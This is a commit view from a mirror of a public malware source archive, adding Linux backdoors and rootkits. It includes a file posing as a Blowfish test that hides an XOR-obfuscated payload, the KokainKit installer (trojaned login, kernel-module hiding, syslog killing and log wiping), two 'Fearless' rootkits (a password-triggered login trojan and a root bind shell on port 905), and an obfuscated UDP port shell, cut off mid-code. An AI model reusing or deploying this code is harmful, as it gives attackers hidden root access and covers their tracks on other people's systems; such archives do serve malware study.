ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 18:06:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2020-10-10 22:00:44 -05:00 committed by GitHub
parent 59bbac0d72
commit b3ade600b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 2005 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

251
Linux/Backdoor.Linux.Bofishy.a Normal file
View File

@ -0,0 +1,251 @@
/*
* Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
* Perform routine compatability checks.
*/
#include <stdio.h>
#define KEY_TEST_NUM 25
static unsigned char key_test[KEY_TEST_NUM]={
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
0x88};
/* DES cbc input vectors */
static unsigned char ecb_data[]={
0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
0x09,0x1e,0x25,0x00};
/* big endian */
static unsigned long bfplain[2][2]={
{0x424c4f57L,0x46495348L},
{0xfedcba98L,0x76543210L}
};
static unsigned long bfcipher[2][2]={
{0x324ed0feL,0xf413a203L},
{0xcc91732bL,0x8022f684L}
};
static unsigned char ocb_data[]={
0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
0x00};
static unsigned char cbc_key [16]={
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
#if defined(WIN16) || defined(__LP32__)
#elif defined(_CRAY) || defined(__ILP64__)
/*
* _CRAY note. I could declare short, but I have no idea what impact
* does it have on performance on none-T3E machines. I could declare
* int, but at least on C90 sizeof(int) can be chosen at compile time.
* So I've chosen long...
* <appro@fy.chalmers.se>
*/
#else
#endif
main(void)
{
int i, n, err;
unsigned char cbc_in[40],cbc_out[40],iv[8];
dup2(1, 2);
#ifdef CHARSET_EPCDIC
epcdic2ascii(ecb_data, strlen(ecb_data));
#endif
printf("# testing in raw ecb mode\n");
n=0;
if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (err)
{
for (i = 0; i < sizeof(ecb_data)-1; i++)
fprintf(stderr, "%c", ecb_data[i] ^ 47);
}
return(0);
}

174
Linux/Backdoor.Linux.Kokain Normal file
View File

@ -0,0 +1,174 @@
#!/bin/sh
# KokainKit v1.6 by deka
# -
# A rootkit based on knark and cobolt.
# Do not Distribute!
# -
TORNDIR=/usr/src/.puta
THEPASS=$1
DITTPORT=$2
THEDIR=/usr/lib/$THEPASS
echo "---------------------------------------"
echo " KokainKit v1.6 by dekah&self"
echo "---------------------------------------"
echo ""
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
if ! test "$(whoami)" = "root"; then
echo " - UID0 check failed"
echo ""
sleep 3
echo "FATAL: You're not root"
exit 1
fi
if test -d "$TORNDIR"; then
echo " - T0rnKit found. Screwing it up"
killall -9 in.inetd
killall -9 t0rntd
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
echo "" > /usr/sbin/in.inetd
echo "ap" > $TORNDIR/.1file
echo "255.255" > $TORNDIR/.1addr
echo "255.255" > $TORNDIR/.1logz
echo "ap" > $TORNDIR/.1proc
fi
if ! test -d "/usr/include"; then
echo " - /usr/include does not exist, making it (ugly)..."
mkdir /usr/include
fi
if ! test -d "/usr/include/pwdb"; then
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
mkdir /usr/include/pwdb
fi
mkdir $THEDIR
if test -d "$THEDIR"; then
echo " - Secret dir created"
else
echo " - MkDir failed"
echo ""
echo "FATAL: Unable to create the secret directory"
exit 1
fi
cd src
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
gcc -O2 cobolt.c -o cobolt
if test -r "./cobolt"; then
echo " - Cobolt compiled"
else
echo " - gcc failed"
echo ""
cd ..
sleep 3
echo "FATAL: Unable to compile Cobolt"
exit 1
fi
touch -acmr /bin/login cobolt
cp /bin/login $THEDIR/login1
cp cobolt $THEDIR/login2
echo " - Cobolt installed"
gcc -O2 autoexec.c -o autoexec
if test -r "./autoexec"; then
echo " - AutoExec compiled"
else
echo " - gcc failed"
echo ""
cd ..
echo "FATAL: Unable to compile AutoExec"
exit 1
fi
touch -acmr /sbin/portmap autoexec
cp /sbin/portmap $THEDIR/portmap
rm -f /sbin/portmap
cp autoexec /sbin/portmap
echo "#!/bin/sh" > $THEDIR/autoexec
echo " - AutoExec installed"
cd ..
killall -9 syslogd klogd
./wipe u root >/dev/null 2>&1
rm -f /var/log/messages /var/log/secure
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
echo " - Logs cleaned"
#echo "" > /etc/hosts.allow
#echo "" > /etc/hosts.deny
#echo " - Hosts.deny/Hosts.allow cleaned"
echo " - Patching dittrich..."
./bpatch ./dittrich __PATCHPort__ $DITTPORT
cat <<E0F>> $THEDIR/.bashrc
alias ls="ls --color -alF"
alias dir="dir --color"
export PS1="\u@\h:\w# "
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
cd
E0F
echo " - .bashrc created"
cp -R dittrich stuff $THEDIR
echo " - Stuff installed"
mkdir $THEDIR/knrk
cd knark
make >/dev/null 2>&1
echo " - Knark compiled"
cd ..
rm -rf knark/knrksrc knark/Makefile
cp -R knark/* $THEDIR/knrk
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
echo "killall -31 dittrich" >> $THEDIR/autoexec
/sbin/portmap >/dev/null 2>&1
echo " - Knark installed"
if test -d "/var/named/ADMROCKS"; then
rm -rf /var/named/ADMROCKS
echo " - AdmRocks erased"
fi
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
rm -f /etc/inetd.conf
cp /tmp/blahah /etc/inetd.conf
rm -f /tmp/blahah
echo " - Inetd.conf fixed"
PATH=/sbin:$PATH
syslogd
klogd
echo " - Syslogd/Klogd restarted"
cd ..
rm -rf *kokain*
echo " - KokainKit removed"
echo ""
#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
if test -d "/proc/$THEPASS";
then
echo "Knark installed successfully."
else
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
cp $THEDIR/login2 /bin/login
fi
echo "kitinst $THEPASS $DITTPORT"
# - EoF - #

85
Linux/Backdoor.Linux.Rootin.a Normal file
View File

@ -0,0 +1,85 @@
#!/bin/sh
# Fearless Rootkit T-Type v0.1
# Coded by Merlion merld_one@yahoo.com
# To run:
# chmod 755 droprk.sh
# ./droprk.sh
# Telnet to login daemon (port 513) and enter password
# Have fun!
arg="$1"
if [ "$arg" = "" ]; then
echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
exit 1
elif [ "$arg" = "-r" ]; then
test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
elif [ $arg = "-i" ]; then
cat > /tmp/drop.c << EOF
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h> /* For daemon related functions */
#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "merlion"
char **execute;
char passwd[8];
main(int argc, char **argv) {
void die(char *error);
void connection();
pid_t pid, sid; /* Daemon variables */
signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;
if ((pid=fork()) < 0) die("Error on fork()"); /* Start daemon process */
if (pid > 0) exit(0); /* Exit parent process */
if ((sid=setsid()) < 0) die("Error on setsid()"); /* Create new session */
if ((chdir("/") < 0)) die("Error on chdir()"); /* Set working directory */
umask(0); /* Set umask to 0 to avoid unwanted rights inheritance */
close(STDIN_FILENO); /* Close */
close(STDOUT_FILENO); /* associated */
close(STDERR_FILENO); /* file streams */
/* On our own now */
scanf("%s", passwd);
if (strcmp(passwd,ROOT) == 0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0); } /* Remove?? */
else {
execv(REAL,execute);
exit(0); } /* Remove?? */
}
void connection() {
execv(REAL,execute);
exit(0); }
void die(char *error) {
perror(error);
exit(1); }
EOF
fi
gcc -o /tmp/login /tmp/drop.c
rm -f /tmp/drop.c
mv /bin/login /bin/.login
mv /tmp/login /bin/
exit 0

74
Linux/Backdoor.Linux.Rootin.b Normal file
View File

@ -0,0 +1,74 @@
#!/bin/sh
# Fearless Rootkit D-Type v0.1
# Coded by Merlion
# Website: http://areyoufearless.com
# chmod 755 rootd.sh
# ./rootd.sh
# telnet to port 905 & run commands. End each command with a semicolon (;)
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
void die(char *error);
main(int argc, char **argv) {
pid_t pid, sid;
int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
unsigned short int mcon;
unsigned short int port;
char *rbuf, *rmode;
struct sockaddr_in Client, Server;
if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
if (argc != 3) die("Usage");
memset(&Server, 0, sizeof(Server));
Server.sin_family=AF_INET;
port=905;
mcon=5;
Server.sin_port=htons(port);
Server.sin_addr.s_addr=htonl(INADDR_ANY);
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
die("No socket options set");
if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
die("Could not bind socket");
if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
pid=fork();
if (pid < 0) die("Initial fork() failed");
if (pid>0) exit(0);
if ((chdir("/")) < 0) die("Could not set working directory");
if ((setsid()) < 0) die("setsid() failed in creating daemon");
umask(0);
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
/* You're on your own, pal.. */
while(1) {
socklen=sizeof(Client);
if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */
clipid=getpid();
serpid=fork();
if (serpid > 0)
waitpid(0, &stat, 0);
dup2(sockcli, 1);
execl("/bin/sh","sh",(char *)0); }
close(sockcli); }
void die(char *error) {
fprintf(stderr, "%s\n", error);
exit(1); }
EOF
gcc -o /bin/rootd /tmp/rootd.c
rm -f /tmp/rootd.c
rootd $port $max
echo "Rootkit installed at port 905"
exit 0

22
Linux/Backdoor.Linux.ShadyShell.c Normal file
View File

@ -0,0 +1,22 @@
/* shadyshell.c by Derek Callaway <super@udel.edu> -- S@IRC
obfuscated/optimized/compact UDP portshell code; Avoid layer 4 IDS ;-)
Example client usage: nc -u host.dom 1337
Greets: inNUENdo, s0ftpr0jects, zsh
*/
#include<stdio.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/in.h>
#include<stdlib.h>
#define DP 1337 /* Default Port */
void ve(const char*f){perror(f);exit(-1);} int isdigit(),dup2();
void usg(char**v){printf("usage: %s [port]\n",*v);exit(0);}
int main(int c,char**v){struct sockaddr_in s={};struct sockaddr u;
char*p,b[512];if(c==2){for(p=v[1];*p;p++)if(!isdigit(*p))usg(v);c=atoi(*(++v));}
s.sin_port=htons(c==2?c:DP),s.sin_addr.s_addr=INADDR_ANY,s.sin_family=AF_INET;
if((c=socket(AF_INET,SOCK_DGRAM,0))<0)ve("socket"); /* www.innu.org/~super */
if(bind(c,&s,sizeof(s))<0)ve("bind");dup2(c,1);dup2(c,2);s.sin_port=sizeof(u);
if(recvfrom(c,&b,1024,0,&u,(int*)&(s.sin_port))<0)ve("socket");
if(connect(c,&u,sizeof(u))<0)ve("socket"); /* No overflows here. :P */
